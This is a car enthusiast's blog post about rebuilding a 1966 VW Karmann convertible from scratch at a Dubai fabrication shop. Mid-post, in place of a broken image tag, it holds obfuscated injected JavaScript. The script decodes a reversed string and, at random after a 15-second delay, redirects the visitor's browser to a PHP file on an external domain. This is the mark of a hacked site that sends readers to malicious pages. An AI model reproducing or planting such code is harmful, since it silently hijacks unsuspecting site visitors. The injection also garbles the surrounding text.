Here is story that is close to my heart. Hidden away in the best bodyshop/Fabrication shop in Dubai is a personal project that has gone way beyond the call of many man…

The full and unadulterated restoration of a 1966 VW Karmann Convertible Type 1 is a pretty heady task for anyone, but when the man is Sacco Dermoussissian you know before seeing the final project that the finished article is going to be completely sano and more than likly 100% better than the car would have originally been back in 1966 as it rolled off the Wolfsburg production line .

Having been a V-Dub head since as a 13 year old I was taken out in a Gaurds Red 356 engined ’63 that my cousin had just fallen in love with. Since then no matter where I am I always keep my eye’s open for cool and interesting dubs…The last place I expected to find a car like this was in Dubai. Having only seen a handful of the cars since moving to Dubai meant that when Sacco called tell me that he had bought one site unseen from a Guy in Canada I was excited to see it arrive in Dubai. To cut a long and painful story short the car was basically junk! What he did have though was a Karmann and it was his after all those years of harking for one.

Sacco and the team at Polimar have effectively started from scratch and re-built the Karmann themselves from the ground up. To put that comment into perspective the only original panel on the car is the dashboard.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/shizzle/SACCOBug5.jpg” alt=”www.crankandpiston.com” width=”728″ border=”0″>

This last picture quite clearly highlights the amount of work and the amount of panels that have been required to get this car back to A1 condition. If Sacco couldn’t buy the panel the team have been making them by hand from scratch. Attention to detail is No.1.

I’ll keep dropping in and keeping you all up to date as the guys plough through the resto work.
